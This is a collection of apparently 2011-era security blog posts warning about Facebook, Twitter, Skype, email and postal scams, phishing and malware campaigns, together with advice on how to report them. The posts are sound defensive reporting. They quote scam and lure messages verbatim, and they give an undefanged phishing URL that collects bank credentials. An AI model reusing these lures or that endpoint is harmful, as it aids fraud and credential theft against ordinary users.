Computer Security Articles

There’s no such thing as a free lunch – or free Facebook credits.  As proof consider the attack described below which has several stages:

1)      Users get messages with offers of “free Facebook credits”

2)      These trick users into running a malicious JavaScript

3)      The infected user is lead to a website – which probably offers the malware distributor some pay per click revenue

4)      The malicious script sends out more “free Facebook credits” messages and the cycle starts again

The attack starts in several ways but always includes messages from a compromised friend account:

• A message with detailed instructions that require actively running a malicious JavaScript:

• A chat message with the text: “%firstname% just tried this and got 500 Facebook credits works great <bad link>”  (The link provides instructions similar to those above about loading the code into the address bar).
• A message is posted on the compromised user’s wall:  ”Did you guys hear about the Facebook glitch you can get 500 Facebook credits? check it out <bad link> “.

• An event invitation with similar free credit content and a link to the instructions website.

Once a user follows the instructions the JavaScript malware will do the following:

1.  Redirect the user to a “confirm your identity” page.

2.  Users clicking on “Continue” will then be directed to a verification dialog box with link to “Get the New iPhone 4 Right Here”.

3.   The final destination for those clicking on the iPhone 4 link will be the Smiley Central website.

A certain number of the compromised user’s friends will now receive the “500 free credits” messages.  Not all friends will receive the message – in one script sample I analyzed the message was sent to 15 friends.  In other scripts some of the details changed but the message and method basically remained the same.

Commtouch’s Command Antivirus detects the JavaScript as malware: JS/Agent.ON.

Be careful when trusting messages, even from your friends. Safe Browsing!

Communication in the today’s world is dominated by email, instant messaging, and social networking. However, for making any formal statement or announcement, hard-copy letters are still sent using postal services. In both mediums, unwanted, unsolicited letters are not new; however, it may still be surprising if a spam message is sent over using postal services – somewhat low tech, but perhaps most effective way to bypass all kinds of online security. In a letter shared by a recipient, we found familiar text seen in emails associated with scams. We confirmed the hard-copy letter to be a 419 scam.

Here is the scanned copy of the letter (where the identity and address of the recipient have been blurred):

Text inside the letter has everything that we commonly see with email scams, except that we do not find any reply-to email addresses. Also, the scammer stresses that recipients must only fax the information (direct telephone and fax number), even if that means buying a new fax machine.

Such spam campaigns are already known to be widespread online and quite possibly had been seen in the past in letter form as well. As always, Symantec is committed to provide maximum security to its online users. However, with this particular incident, we would like to remind users to be careful of these hand-delivered scams also.

This scam has been around for years – basically, you get an unsolicited email from a company claiming to be a domain registrar in China (it is usually China) that says that someone is trying to register a domain similar to one that you already own. The idea is that the recipient will panic and buy an overpriced and basically worthless domain from them.

If you are worried about domain poaching, then usually the best place to start is your own domain registrar or another well-known reliable vendor, rather than responding to this unsolicited approach.

From: John <john.chen@ygnetwork-ltd.com>
Date: 22 April 2011 06:26
Subject: Urgent notice of Intellectual Property protection

Dear Manager:

This email is from China domain name registration center, which mainly deal with the domain name registration and dispute internationally in China and Asia.
On April 21st 2011. We received HAITONG  company’s application, they want to register ” dynamoo” as its Internet keyword and CN/Asia domain names. It is china and Asia domain names. But after checking we find this domain name conflict with your company, in order to deal with this matter better, so we send you email, and want to confirm whether this company is your distributor or business partner in China?

I’m looking forward to hearing from you!

Best Regards,

John
Oversea marketing manager
Office: +86(0)21 6191 8696
Mobile: +86 1366152 9704
Fax: +86(0)21 6191 8697
web: www.ygnetwork-ltd.com

A Twitter follower sent me this link to check out: www.hackfacebook.org

This page promises to retrieve the Facebook password from your cheating girlfriend or if you just have an insatiable desire to know everything about a person.

Are you ready for this? Let’s:

But don’t get too excited just yet! You need to fill out a survey:

Online surveys are just dumb questionnaires to get you to enter your cell phone number.

What is the big deal you may ask? Well, By entering your number in there you agree to a contract. It is very sneaky and well done courtesy of online marketers. Since most people don’t read the fine prints, they get stuck paying charges for something they never wanted in the first place.

This particular scam charges you $5 a week for ‘Amazing facts’ or you may call this garbage.

Jerome Segura

In a bizarre and hard-to-understand move, a Facebook page which claims it helped countless Facebook members stay safe online on the social network has been shut down… by Facebook.

The Bulldog Estate is one of a number of different resources on the internet dealing with the subject of Facebook scams, rogue applications, and the like. Other examples include Scam Sniper, FaceCrooks and Sophos’s own Facebook community.

On Monday 18th April, the Facebook page belonging to Scam Sniper was shut down by Facebook authorities:

@ScamSniper
Scam Sniper
Notice: The Sniper Has Been Shot. Facebook Disables The Admins Of The Facebook Fan Page Scam Sniper. http://goo.gl/RdlVF
April 18, 2011 3:26 pm via webReplyRetweetFavorite

Later that day, the same fate befell The Bulldog Estate’s Facebook presence, leading the scam-exposing site to say that Facebook had made a bad PR move:

@bulldognk
The BULLDOG Estate
The BULLDOG Estate Facebook Page Has been Closed by Facebook, They Dont Like bad press, Watch… http://goo.gl/fb/K3ODY
April 18, 2011 11:42 pm via GoogleReplyRetweetFavorite

The Scam Sniper Facebook page was eventually restored, but Tony Mazan, the owner of The Bulldog Estate, hasn’t had the same luck.

Mazan has been contacting Facebook since Monday attempting to understand why The Bulldog Estate’s Facebook page was closed, and how it might be recovered.

Today Mazan received a standard response from Facebook, which still wasn’t specific about the reasons that The Bulldog Estate’s Facebook presence had been killed off:

"Hi Tony

You created a Page that has violated our Statement of Rights and Responsibilities, and this Page has been removed. Facebook Pages may only be set up for the purpose of promoting a business or other commercial, political, or charitable organization or endeavor (including non-profit organizations, political campaigns, bands and celebrities), and only by an authorized representative of the entity or individual that is the subject of the Facebook Page. By creating a Facebook Page, you represent and warrant that you are authorized to do so by the person or entity that is the subject of the Facebook Page. Among other violations, Pages that are hateful, threatening, or obscene are not allowed. We also take down Pages that attack an individual or group or that promote or glorify violence, intolerance, racism or discrimination. Continued misuse of Facebook's features could result in your account being disabled."

This “explanation” clearly hasn’t satisfied the many fans of The Bulldog Estate, who have created pages urging Facebook to reinstate The Bulldog Estate, and left messages on Facebook’s official safety pages.

“We helped countless members on Facebook and supported Facebook in trying to help Facebook users stay safe online, We do not advertise or make money from our help, our blog writers are volunteers, and our admins are volunteers,” Tony Mazan of The Bulldog Estate told Naked Security. “What we can not understand is why Facebook removed a real help group and yet there are thousands of rogue applications, thousands of hate filled pages, thousand of fake profiles. We are as real as it gets and get shut down.”

“Is it because Facebook security never gets comments like ‘We Love you’ or ‘thanks for always alerting us on time with user-friendly information’,” continued Mazan. “As one of our supporters said – you may shut the dog outside, but you will never silence the bark.”

Although the language used on The Bulldog Estate’s website doesn’t beat around the bush, it seems clear to me that the content they produce is beneficial and helps Facebook users avoid scams and other attacks.

Maybe Facebook needs to be a little less robotic in its shutdown of this scam-exposing community, and could work a little more closely with Tony Mazan and his colleagues to bring what is a helpful resource for its users?

Update: The Bulldog Estate reports that its Facebook page has now been restored, and that Facebook has apologised for its mistake.

At some point in your life, one or several of the Facebook scams out there might affect you enough to look for ways on how to report them and go on a vendetta rampage against the scam creator.  In fact, one of the most effective tools against the prolific scammers on Facebook is to report their rogue applications, fake events, wall postings, etc. If enough people take the time to report the Facebook scam, then hopefully, eventually, Facebook will take action and shut them down! 

So here goes.  How exactly do you report a Facebook scam? 

Tell Mark Zuckerberg 

 .or at the very least tell it to the people in his company tasked with monitoring and responding to Facebook scam complaints.  Be on the lookout for that report button that’s hidden somewhere on the page like those hidden Mickeys on Disney channel.  

1.  Reporting a Link:  Most Facebook scams propagate through the newsfeed.  Here, you can already take action and report the scam link.  Just hover your cursor over the post and you will see an X button appear on the right hand corner.  Clicking this X button will then give you the option of marking that particular post as spam. 

 Doing so will replace the post with this text:

Thanks for Your Help

Your feedback helps us keep News Feed clear of spam. Undo Spam Report

File a more detailed report 

Clicking the “file a more detailed report” gives you the option of classifying the post as: 

. Spam or scam

.   Contains hate speech or attacks an individual

.   Violence or harmful behavior

.   Nudity, pornography, or sexually explicit content 

2.  Reporting an Application:  Applications are popular scam vehicles because of the fact that they can legitimately mine your profile information.  Of course, they can also convince you to do some other nifty and ultimately stupid things like answer a senseless survey about what type of werewolf are you, or what other things you do with your toothbrush aside from brush your teeth.  It’s understandable how these mindless surveys can induce rage from people who are expecting a free iPad. 

To report an application you must scroll down to the bottom of the page and look for the “report App” link which, interestingly enough is right above the share link.  Clicking this link will then give you more options on how to categorize your complaint: 

* Privacy issue

* Inappropriate or pornographic content

* Advertising issue

* Spam

* Bullying/Harassment

* Other

You can opt to send a copy of your complaint to the developer and you can also upload a screenshot to give the Facebook security team more info from which they can base their decision.

Another option to report a rogue application is on the familiar application installation screen:

3.  Reporting an Event or a Group:  The report link for an event or a group can be found way down on the page after the messages.  As with the report a page link, the options available here are: 

* Spam or scam

* Contains hate speech or attacks an individual

* Violence or harmful behavior

* Nudity, pornography, or sexually explicit content

The wall automatically loads older posts as you scroll down so you may have to scroll down for quite a bit before you get to the report link at the very bottom of the page – which is a weird place to set a report button for a company that claims utmost vigilance in protecting its members against scams.

 4.  Reporting a Message:  The report button for Facebook users with the old messaging system can be found at the top bar before the message much like on yahoo mail, Gmail, etc.  Just click the report as spam button and voila! The report is sent. 

Things get a little more complicated for Facebook users having the new Facebook email.  Here, you have to click the actions dropdown button and choose report as spam.  Facebook will then ask you to confirm if it’s indeed spam.  If yes, it will then move the message to the junk folder – presumably so you can peek at it again should you changed your mind later.  The good thing in the new Facebook email is that you can also report or block the user who sent the spam message right from the dropdown. 

5.  Reporting a Photo or a Video:  The report button for Photos and Videos can be found on the right-hand sidebar of the item.  The options made available when you click the report link on a photo are: 

Photo:

* Spam or scam

* Nudity or pornography

* Graphic violence

* Attacks individual or group

* Hate symbol

* Illegal drug use

For a video, the options that appear upon clicking the report link are:

 Video 

* Spam or scam

* Contains hate speech or attacks an individual

* Violence or harmful behavior

* Nudity, pornography, or sexually explicit content

 A caveat from Facebook Help though:

 ”It is not a violation of our Statement of Rights and Responsibilities to post a photo that is unflattering, so please don’t report a photo just because you don’t like the way you look in it.” 

So if someone posts a picture of you drooling in your sleep while you scratch your exposed tummy or laughing out loud with an extra large booger in your nose – don’t get your hopes up that it will be taken down.  But wait, the important thing is that you can report scams and spam right? 

6.  Report a Facebook User:   In the event of a 419 scam, a cyberbullying scam or a case of identity theft, you can also report a Facebook user profile to the Facebook security group.  Identity thefts and cyberbullying cases are pretty easy to recognize.  419 scams on the other hand may be a bit harder to identify since you never know when you are talking to a real Nigerian prince or a friend who got mugged in London and lost much of his or her English writing skills along with their wallet. 

In any case, the report button for Facebook profiles can be found near the bottom of the left-hand sidebar – below the profile links, the friend list, the family list, the share profile link.. In fact the report link is the bottom-most link -  it’s almost like scrolling down has become the digital version of Government red tape. 

Upon clicking the report link, the following options are then made available to you: 

Please select one of the following options: 

* This is my profile, but I no longer have access to it

* This profile is pretending to be someone or is fake

* Inappropriate profile photo

* Inappropriate profile information

* This person is bullying or harassing me 

Select the option below if you would like to block this person:

* Block “user name” 

Blocking means you won’t be able to see or contact each other on Facebook. 

7. Report to Facecrooks – Last but not least, be sure to report any scam you run across to us, so we can alert the Facecrooks community! 

Reporting Facebook scams is definitely a very important part in keeping the whole social network secure.  Security experts say that fighting Facebook scams is an uphill battle because it’s almost as easy for scammers to change scam links or create new profiles as it is for Facebook users to report these scams.  You may be only one of the 600 million users on Facebook, but taken as a whole, it’s people who take the time to report scams, security issues and bugs that make this digital social frontier a safer place. 

It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of – you guessed it – fake Twitter email messages, similar to the one here:

How can the uninitiated determine that it’s not a real message from microblogging service Twitter? Well, the typo in the subject and body give the first clue (it should say “2 direct messages” not “message” in the singular – but that’s just petty). The really easy way to tell is to simply mouse over the “twitter” URL and look for the real URL that will show up either at the bottom of the window, or right over the cursor, depending on your email program. If the real URL is not a Twitter URL, then it’s definitely a scam.

I can’t even tell you what this particular message was trying to get from its recipient since by the time I clicked the link — less than 24 hours after it had been received — the link was already dead. Past fake Twitter messages have been pharmacy spam, but since the site was already taken down it may have been phishing. A short-lived landing page is also a surefire sign that the email is not legit. Real web sites typically keep their landing pages around for a long time — practically forever, in fact — since no marketer wants to take the chance that someone will open their mail several weeks after its been sent and execute the sought-after act of clicking through, and then have this enchanted potential customer land on a non-existent page. Phishers and scammers, however, are always trying to outrun security software and the law, and one of the ways they try to do so is to keep their sites up for a very short time. The flood inboxes with messages linking to the ephemeral scam/phish landing page, and anyone that they can convince to click through in the short time the page is live, clicks, anyone after that short time the site is taken down has been saved from the scam simply by being slow to open their email.

Recently, I received an email in my personal inbox with a subject line “MYSTERY SHOPPER ASSISTANT” (the message did not filter to my junk folder and was not marked as spam).

Image 1 – “Mystery shopper assistant” spam

I’m familiar with the hobby of mystery shopping – a service provided under contract where the contractor discreetly reviews an establishment and observes various aspects such as customer service, cost of goods or services sold and so on. The contract then reports back to the contracting agency and receives a modest payment, commonly less than $50 plus reimbursement for any item purchased. This email however was laced with the promise of paying $300 per assignment, which sounded my inner suspicion alarm.

Image 2 – the lure

Several key components of the message attempted to lend credibility to the post, for instance, naming companies that employ the services of secret shoppers. The message is a scam, however — readers beware.

The scam scheme begins when the prospective secret shopper responds to the email. The scammer may send the target additional instructions such as what part of the store to review; for instance, Wal-Mart’s “MoneyCenter” service, an in-store service that allows customers to send money electronically to a recipient. The scammer obtains the target’s address and sends them a (fraudulent) cashier’s check with instructions to cash the check, keep $300.00 for themselves, and send a remainder back to the scammer. This is a classic fraud scenario as the trick in this case is that the cashier’s check is made of rubber, and the person cashing the fake check is liable for amount of the cashed check during the transaction. Meanwhile the scammer has received valid cash at your expense.

Wal-Mart stores have been a conduit for scammers for a few years now, and there is a landing page on the Wal-Mart site describing the “Mystery Shopper Scam”:
http://walmartstores.com/PrivacySecurity/9567.aspx

In a section titled “How to protect yourself“, it is mentioned that no legitimate business “will pay in advance and ask you to send back a portion of the money.” The MMPC concurs with this statement – and don’t forget the old adage that if it sounds too good to be true, it probably is.

– Patrick Nolan, MMPC

Once again Twitter users are finding themselves hit by a fast-infecting attack, more commonly encountered by their Facebook-using cousins: a rogue application spreading virally across the network.

Thousands of Twitter users have fallen into the trap of allowing rogue third-party applications access their Twitter accounts, believing that it would tell them how many people have unfollowed them.

A typical message reads:

58 people have unfollowed me, find out how many have unfollowed you: [LINK] #rw2011 #duringsexplease #youneedanasswhoopin

See the hashtags? They appear to be currently trending phrases on Twitter – presumably the rogue applications are using them in the messages they spam out in an attempt to trick more users into clicking on the links.

If you do click on the link you are asked to give authorisation for a third-party application to access your Twitter account.

Don’t, whatever you do, press the “Allow” button. If you do, then a third party is now capable of tweeting messages in your name to all of your Twitter followers – which spreads the scam virally across Twitter and may result in one of your online friends also having their account compromised.

So, how do the scammers make money? That’s the next piece of the jigsaw.

You’re anxious to find out who has unfollowed you on Twitter. The scammers take advantage of that by presenting a webpage which looks as if it’s about to reveal that information – but is actually designed to make you take an online survey instead.

The scammers make money for each survey that is completed.

If you were unfortunate enough to grant one of these rogue applications access to your Twitter account, revoke its rights immediately by going to the Twitter website and visiting Settings/Connections and revoking the offending app’s rights.

(Note that the scammers are using a variety of different applications – so you may see a different name from the one I picture above).

Don’t make it easy for scammers to make money in this way, and always exercise caution about which third party apps you allow to connect with your social networking accounts.

If you’re on Twitter and want to learn more about threats, be sure to follow Naked Security’s team of writers.

Dear Facebook,

As you know, for some years we have been discussing with your security team our concerns about safety and privacy on Facebook.

Every day, victims report to us numerous incidents of crime and fraud on Facebook. They have been personally affected and are desperate for advice on how to deal with the consequences.

A frequent refrain from users who contact us is, ‘Why doesn’t Facebook do more to protect us?’

We have identified three simple steps you can take to better protect your users:

1) PRIVACY BY DEFAULT

No more sharing of information without your users’ express agreement (OPT-IN). Whenever you add a new feature to share additional information about your users, you should not assume that they want this feature turned on.

2) VETTED APP DEVELOPERS

It is far too easy to become a developer on Facebook. With over one million app developers already registered on the Facebook platform, it is hardly surprising that your service is riddled with rogue applications and viral scams. Only vetted and approved third-party developers should be allowed to publish apps on your platform.

3) HTTPS FOR EVERYTHING

We welcome you recently introducing an HTTPS option, but you left it turned off by default. Worse, you only commit to provide a secure connection “whenever possible”. Facebook should enforce a secure connection all the time, by default. Without this protection, your users are at risk of losing personal information to hackers.

Why wait until regulators force your hand on privacy? Act now for the greater good of all.

Your users tell us that these are issues they want resolved. So our question is simple: when do you plan to act?

Sincerely,

Naked Security

Earlier this week, I received a phone call via Skype on my laptop, the caller’s ID was “dralerthelpzc8” as in Dr Alert Help ZC8. The voice on the other end was automated, computerized and otherwise non-human, and alerted me that I had a virus that affects Windows Vista, Windows XP and Windows 7 and that I needed to visit a website to download an update. (This is somewhat similar to the situation where a live person calls and purports to being a Microsoft employee and wants to help you clean your computer. We want to point out that no Microsoft employee would ever call you in an unsolicited manner.)

I found the mystery Skype call odd on two accounts – one, I work for a security company that develops antimalware security software, and two, my Skype settings were initially set to not display if I’m online. Apparently my privacy settings had no effect on if I received a random call. More on that later.

After some checking around various forums about this ‘helpful’ (not!) voice message alert, I discovered that many people in the Skype community have also received similar phone calls. There were a lot of references to “scam” and “rogue AV scanners” so my gut feeling was not too far off at all. I did find some other forums that included screen shots that indicated a tell-tale sign that indeed, the referenced site distributed rogue software.

According to IP records, the site mentioned in the automated call (sos**.com, obfuscated intentionally) is listed as belonging to ASN 4134, aka CHINANET-BACKBONE, which has a long list of IP addresses known to distribute malicious code. I attempted to visit the site; however, it was already offline, returning an HTTP 404. There was a cached view available and it resembled a version of a fake scanner web page:

Image 1 – cached page sos**.com

One forum displayed a screen shot, captured in March, that listed a system tray dialog that looked vaguely familiar. Below is a copy of the message text:

Warning errors detected

Click here to view errors list.
Remove this errors as soon as possible to prevent
data lost and privacy information exposure

This error message was also used by Trojan:Win32/FakeSpyguard in 2008. The forum mentioned that clicking on the system tray message redirects the web browser to an online purchasing site (also offline) where you can enter a CC number to purchase the (presumed to be) rogue malware.

Reviewing the sequence of events, I decided I would make changes to my Skype account to prevent future spam phone calls of this nature, for instance:

• select ‘Allow calls from people in my Contact list only’
• select ‘Show that I have video to people in my Contact list only’
• select ‘Automatically receive video and screen sharing from people in my Contact list only’
• select ‘Allow IMs from people in my Contact list only’
• unselect ‘Allow my online status to be shown on the web’

Image 2 – Skype privacy settings

For more articles on Skype security, visit this link on the Skype product site:
http://www.skype.com/intl/en-us/security/

- Dan Nicolescu & Patrick Nolan, MMPC

Right now there's a scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video – LOL" (example screen shot below). Websense customers are protected with by ACE, Advanced Classification Engine. During the 15 minutes it took to write this post over 7,000 new users liked the page so it's clear this is a successful campaign.

This latest scam is very much like a lot of others we see on a regular basis on the world's most popular social networking site. But this one seems to be especially popular for some reason.

When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs.

The page that you are tricked into liking has been liked by over 272,000 users and doesn't really have anything to do with the scam itself but is perhaps there to make it look more legitimate. The quote "<name>, are you scared? Of course I'm scared. I'm not Superman" is a quote by the actor Jackie Chan. 

After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all. Note that the attackers haven't even bothered to change the title of the last payload site. The title still says "Look What Happens When a Father Catches her Daughter on Webcam" which is another scam that went around Facebook months ago.

As always, if a video forces you to like, share, or install an app to view it, DON'T DO IT! And of course, install Defensio, our free security app for Facebook. It will keep scams like this from ever appearing on your news feed in the first place.

We’re monitoring an on-going Facebook scam campaign that seems to be spreading faster than any campaign we’ve come across before.

What did this girl do on her webcam?

The scam starts with a user being tagged in a photo such as the one above. The photograph is posted in an album called “BBC News” to give it authenticity. It typically has over 100+ people tagged in it and it contains the following text: “Everyone do check what she did on cam …. — [URL]”

An example of what it would look like to see your friends tagged in this photo

The short URL typically redirects the users to a .info domain, which then takes the user to a Facebook Application Installation page.

Short URL redirects to the following Application Install Page

When a user allows the application, the scam continues with that user posting the same photo, tagging over 100 users in it and helping it propagate.

Over 100 Friends tagged in this scam

Users are also redirected to another .info domain, which contains a video that is gated by another form of a survey scam:

Facebook Verification Spam Bot – Freudian Slip?

The scammers have managed to be nimble enough to switch the campaign from one Short URL service to another. At first, this was spreading via Bit.ly:

Bit.ly Stats as this scam was first spreading

Over the course of an hour, this particular URL received over 80,000 clicks.  However, the scam has since shifted to the Goo.gl Short URL service:

Goo.gl Short URL Statistics for this scam

In less than an hour, the goo.gl version of the scam has reached over 125,000 clicks.

Recommendations: First and foremost, don’t click on the link included in the description of the photograph. One of the things you can do to prevent your friends/family members from falling for this is to untag yourself from the photograph:

You can untag yourself from any photo

Additionally, you can report the image so that Facebook can take action against it (this is an important step):

You can help prevent this scam from spreading by reporting it

If you’ve been tricked into installing the application, visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites.  Locate the Rogue Application under the Apps and Websites section (typically has the word “news” in it). Once you’ve located it under the  ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.

Scammers are finding new ways to trick users. The key here is to be aware and to keep your friends and family members in the loop about scams like this one.  We can’t stress that enough.

Update: The goo.gl short URL has now logged over 220,000 clicks.

Over 220,000 clicks on the goo.gl short URL

Additionally, the scammers have also moved to TinyURL:

Scammers are also using tinyurl to lead users to the scam application

Its now Bank of Baroda getting targeted for the phishing attacks.

A mail having subject line : MESSAGE TO ALL BARODA CONNECT USERS!!! getting circulated containing an
attachment.

If you click to open the htm file, it displays Bank of Baroda Login form.This form get displayed from your local machine.
It ask to fill your confidential information such as Corporate ID,User ID, Password etc.

We have analysed the Htm file and found that it contains a fraudulent link http://174.120.139.34/ ~buupy/images/log. php and this is that link,where your confidential data is transferred.

Quick Heal Successfully blocks the fradulent url and delete the malicious htm file too.

Among a lot of various scam emails about “post express“, we found one email that is unfamiliar, and pretty sure this is a different malware, with subject “Available for pickup“, and included an executable attachment file, “Sent.exe“.

Dear Sir
I have just returned and received your message — it is 2:25 am in Vancouver.

I have received a communication from your partner (I am forwarding it separately) and am waiting for an official translation that I will then take up with my colleagues.

Hence, the funds has been sent via western union and money gram respectively

REF: 9310 5521 Amount: 3000 CAD
MTCN: 764 327 9355 Amount: 2000 CAD

The payment receipt is attached in a single file

I hope to hear from you soonest

Both payments are available for  pick up

Sebat

We try to dig it deeper with the attachment, and found out that this is a Keylogger. From the decrypted configuration file, we can see the used SMTP server and the target email address for sending the report.

All recorded keystroke will be send to the target email address, including your IP, computer name, and the user name.

Keep update your Emsisoft Anti-Malware, and always stay alert and be cautious with everything you receive.

We’ve been monitoring a new Facebook scam that is spreading via Facebook Chat messages.  This particular scam usually begins with a chat message from a friend like the one below:

Example of the Facebook Chat message

Once a user clicks on the link, they are redirected via the site used in this campaign (hxxp://millium.co.cc) to a Facebook Application installation window.

Facebook App asks for access to Facebook Chat

The reason this is spreading so quickly is because the Rogue application is asking for access to Facebook Chat. Once the application is installed, it begins spamming your Facebook friends/family members with the same message seen above.

After the application is installed, the user is redirected back to the site above and presented with the following image:

Click on the picture to see yourself in a sexy photoshop!

Your attention needs to be diverted long enough to allow the message to spread to your friends and family. Clicking on the photograph takes you to a Graphic Design blog entry that contains 45 Strange and Funny Photoshop Manipulations – none of which feature a photograph of you.

This scam is spreading rapidly.  Over 88,000 clicks per hour, currently sitting at over 500,000 clicks today.

88,888 Clicks Per Hour

Over 500,000 Clicks Today

At this point, we do not know what the end game is for the scammers here. The destination site results in no malicious infection and does not lead to a survey scam. Having access to a users’ Facebook Chat could allow the scam application to be used to send out other messages.

If you or anyone you know have been tricked into installing this application, you can start by removing the application from your Facebook profile.  Visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites.

Find the Rogue Application under the Apps and Websites section

Once you’ve located the application (named ‘millium’) in the ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.

Remove 'millium' Rogue Facebook Application

Removing the application is one thing. We encourage users, those who have been tricked into installing this application and those who haven’t to reach out to family and friends on Facebook and inform them that this scam is spreading.  Knowing is half the battle.

MX Lab reported earlier on regarding a malicious spam campaign regarding an offer to download and buy PDF Reader/Writer for Windows and Mac in the articles Malicious spam campaign regarding Adobe Acrobat 2010 PDF Reader and VOIP Addons for Skype and Emails offering PDF Reader 2010 lead to unsecure payment site.

MX Lab noticed a new version that will offer the latest PDF Reader. The emails have the subject “Download Adobe Reader 10 Alternative”  with the email address dailynews_dec09@m120.redmediaone.com.

This is the body of the email:

Following the link to the web site will lead us here:

When clicking on the download button we have the following screen that looks very familiar:

Okay, let’s go throught the registration process:

The registration transactions are performed on the domain secure-signupway.com. This domain is know for fraudulent payment processing so your credit card details will end up in the wrong hands.

Now, this is also interesting. The domain from where the message is sent, redmediaone.com, has protected registrant details in the WHOIS.

Registrant:
   redmediaone.com
   c/o Whois Privacy Service
   PO BOX 501610
   San Diego, CA 92150-1610
   US

   Domain Name: REDMEDIAONE.COM

   Administrative Contact, Technical Contact, Zone Contact:
      redmediaone.com
      c/o Whois Privacy Service
      PO BOX 501610
      San Diego, CA 92150-1610
      US
      (619) 393-2111
      whois@emailaddressprotection.com

   Domain created on 18-May-2010
   Domain expires on 17-May-2012
   Last updated on 25-Mar-2011

   Domain servers in listed order:

      NS1.DOMAINDISCOVER.COM
      NS2.DOMAINDISCOVER.COM

In the message is the download URL and an unsubscribe URL present that is handled by http://list.onemediaclick.com/. And also iin this case, the registrant details are protected.

Domain Name: ONEMEDIACLICK.COM
Registrar: MONIKER

Registrant [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         208.73.210.41
        NS2.DOMAINSERVICE.COM         208.73.211.42
        NS3.DOMAINSERVICE.COM
        NS4.DOMAINSERVICE.COM

        Record created on:        2011-02-14 12:05:30.0
        Database last updated on: 2011-02-14 12:05:32.93
        Domain Expires on:        2012-02-14 12:05:31.0

The web site of  Onemediaclick:

These guys are, according to the address on the site, located in Switzerland. When trying to contact them through the web form, nothing happens. The <form> tags are not included in the web form when looking at the source. Seems to me that this whole business can not be trusted.